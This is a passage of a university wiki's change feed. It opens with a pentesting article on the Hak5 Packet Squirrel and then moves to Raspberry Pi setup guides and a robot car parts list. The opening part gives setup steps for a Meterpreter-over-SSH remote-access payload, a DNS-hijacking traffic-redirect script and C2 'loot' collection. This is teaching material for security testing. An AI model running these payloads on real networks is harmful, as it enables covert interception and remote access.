You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=SSH_Server_on_Raspberry_Pi_with_Raspbian_Lite:_Setup&amp;diff=6076</id>
		<title>SSH Server on Raspberry Pi with Raspbian Lite: Setup</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=SSH_Server_on_Raspberry_Pi_with_Raspbian_Lite:_Setup&amp;diff=6076"/>
		<updated>2021-03-01T17:48:22Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This guide explains how to configure a static IP-Address and setup a ssh server on raspbian Lite.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Raspberry Pi&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting a static IP ===&lt;br /&gt;
&lt;br /&gt;
This guide uses the &#039;&#039;/etc/network/interfaces&#039;&#039; file to configure a static IP.&lt;br /&gt;
Edit the file with:&lt;br /&gt;
 sudo nano /etc/network/interfaces&lt;br /&gt;
Enter the following lines with your desired IP-Address and network configurations:&lt;br /&gt;
 auto eth0&lt;br /&gt;
 allow-hotplug eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 192.168.0.133&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 192.168.0.1&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; Don&#039;t choose a IP-Address from your dhcppool.&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH ===&lt;br /&gt;
&lt;br /&gt;
I am going to use the terminal to enable the SSH server.&lt;br /&gt;
To enable the SSH server enter the following two commands:&lt;br /&gt;
 sudo systemctl enable ssh&lt;br /&gt;
 sudo systemctl start ssh&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Raspberry Pi 3 Model B+]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.raspberrypi.org/documentation/remote-access/ssh/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=SSH_Server_on_Raspberry_Pi_with_Raspbian_Lite:_Setup&amp;diff=6075</id>
		<title>SSH Server on Raspberry Pi with Raspbian Lite: Setup</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=SSH_Server_on_Raspberry_Pi_with_Raspbian_Lite:_Setup&amp;diff=6075"/>
		<updated>2021-03-01T17:46:20Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Create the page.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This guide explains how to configure a static IP-Address and setup a ssh server on raspbian Lite.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Raspberry Pi&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting a static IP ===&lt;br /&gt;
&lt;br /&gt;
This guide uses the &#039;&#039;/etc/network/interfaces&#039;&#039; file to configure a static IP.&lt;br /&gt;
Edit the file with:&lt;br /&gt;
 sudo nano /etc/network/interfaces&lt;br /&gt;
Enter the following lines with your desired IP-Address and network configurations:&lt;br /&gt;
 auto eth0&lt;br /&gt;
 allow-hotplug eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 192.168.0.133&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 192.168.0.1&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; Don&#039;t choose a IP-Address from your dhcppool.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH ===&lt;br /&gt;
&lt;br /&gt;
I am going to use the terminal to enable the SSH server.&lt;br /&gt;
To enable the SSH server enter the following two commands:&lt;br /&gt;
 sudo systemctl enable ssh&lt;br /&gt;
 sudo systemctl start ssh&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Raspberry Pi 3 Model B+]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.raspberrypi.org/documentation/remote-access/ssh/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Install_Raspbian_OS_on_a_Raspberry_Pi&amp;diff=6074</id>
		<title>Install Raspbian OS on a Raspberry Pi</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Install_Raspbian_OS_on_a_Raspberry_Pi&amp;diff=6074"/>
		<updated>2021-03-01T17:32:08Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added installation guide for windows.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Install Raspbian OS on a Raspberry Pi using a 16 GB SD card&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* PC with SD card reader&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64 / Windows 10&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Ubuntu ===&lt;br /&gt;
==== Check device id ====&lt;br /&gt;
Insert the SD card in the SD card reader and determine the devices on the machine by issuing following command in a terminal&lt;br /&gt;
&lt;br /&gt;
    lsblk&lt;br /&gt;
    NAME        MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
    sda           8:0    0   477G  0 disk &lt;br /&gt;
    ├─sda1        8:1    0   953M  0 part &lt;br /&gt;
    ├─.....&lt;br /&gt;
    mmcblk0     179:0    0  14,6G  0 disk &lt;br /&gt;
    └─mmcblk0p1 179:1    0  14,6G  0 part &lt;br /&gt;
&lt;br /&gt;
SD card is device mmcblk0 which contains a partition mmcblk0p1, in the case this partition is autmatically mountet  unmount the partition with&lt;br /&gt;
&lt;br /&gt;
    umount /media/&amp;lt;username&amp;gt;/&amp;lt;dev-id&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Download image ====&lt;br /&gt;
&lt;br /&gt;
Download newest raspbian desktop from https://www.raspberrypi.org/downloads/raspbian/&lt;br /&gt;
The current version at time of the documentation was 2019-09-26-raspbian-buster-full.zip&lt;br /&gt;
&lt;br /&gt;
==== Unzip and install ====&lt;br /&gt;
&lt;br /&gt;
* Copying a zipped image to the SD card and showing the progress by using following command&lt;br /&gt;
&lt;br /&gt;
    unzip -p 2019-09-26-raspbian-buster-full.zip | sudo dd of=/dev/mmcblk0 status=progress conv=fsync &lt;br /&gt;
    6799950336 bytes (6,8 GB, 6,3 GiB) copied, 555 s, 12,3 MB/s&lt;br /&gt;
    13303808+0 records in&lt;br /&gt;
    13303808+0 records out&lt;br /&gt;
    6811549696 bytes (6,8 GB, 6,3 GiB) copied, 569,647 s, 12,0 MB/s&lt;br /&gt;
&lt;br /&gt;
==== Verify image [optional] ====&lt;br /&gt;
This is done by copying back the image with dd from the SD card into another file and compare that file to the original image with diff.&lt;br /&gt;
&lt;br /&gt;
* The output of the first copying dd command shows the number of written blocks, so you need only to copy this number&lt;br /&gt;
&lt;br /&gt;
   xxx+0 records in&lt;br /&gt;
  &lt;br /&gt;
* then copy these xxx=13303808 blocks from the image to a new file&lt;br /&gt;
&lt;br /&gt;
   sudo dd bs=4M if=/dev/mmcblk0 of=from-sd-card.img count=13303808&lt;br /&gt;
&lt;br /&gt;
* Unzipp the  original image&lt;br /&gt;
&lt;br /&gt;
   unzip 2019-09-26-raspbian-buster-full.zip&lt;br /&gt;
   &lt;br /&gt;
* truncate to the other size&lt;br /&gt;
 &lt;br /&gt;
    sudo truncate --reference 2019-09-26-raspbian-buster-full.img from-sd-card.img&lt;br /&gt;
&lt;br /&gt;
* and compare&lt;br /&gt;
   diff -s 2019-09-26-raspbian-buster-full.img from-sd-card.img &lt;br /&gt;
   Files 2019-09-26-raspbian-buster-full.img and from-sd-card.img are identical&lt;br /&gt;
&lt;br /&gt;
=== Windows ===&lt;br /&gt;
Download your prefered image from the [https://www.raspberrypi.org/software/operating-systems/#raspberry-pi-os-32-bit offical raspberrypi website].&lt;br /&gt;
For this guide we&#039;re going to use the Raspberry Pi Imager. You can download it [https://www.raspberrypi.org/software/ here].&lt;br /&gt;
&lt;br /&gt;
Start Raspberry Pi Imager. Select your OS from the harddisk, SD-Card and press write. After the Imager is done you can plug the SD-Card in your Raspberry Pi.&lt;br /&gt;
The standard login for raspbian is:&lt;br /&gt;
Username: pi&lt;br /&gt;
Password: raspberry&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; The raspbian uses the english keyboard layout.&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
[[Kingston 16GB micro SD-HC class 10 Accessory]]&lt;br /&gt;
[[Raspberry Pi 3 Model B+]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.raspberrypi.org/documentation/installation/installing-images/linux.md&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=6073</id>
		<title>Keyestudio 4WD Bluetooth multifunctional car kit</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=6073"/>
		<updated>2021-03-01T15:42:03Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added Bluetooth Module code&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the keyestudio 4WD Bluetooth Multi-functional Car Kit. The documentation contains schematics, tipps and code for the car. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Arduino IDE&lt;br /&gt;
* 18650 Batteries (not included in kit)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Component list ===&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Product Name&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;Quantity&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio UNO R3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Shield V5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio L298N Motor Shield&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Bluetooh HC-06&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;I2C 1602 LCD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Line Tracking Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;HC-SR04 Ultrasonic Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Digital IR Receiver Module&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Top PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Bottom PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Plastic Platform&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;IR Remote Control&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Toggle Switch + Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;18650 Battery Holder&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;DC Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Motor Fixed Part&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Plastic Tire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 40MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 10MM&amp;lt;/td&amp;gt;&lt;br /&gt;
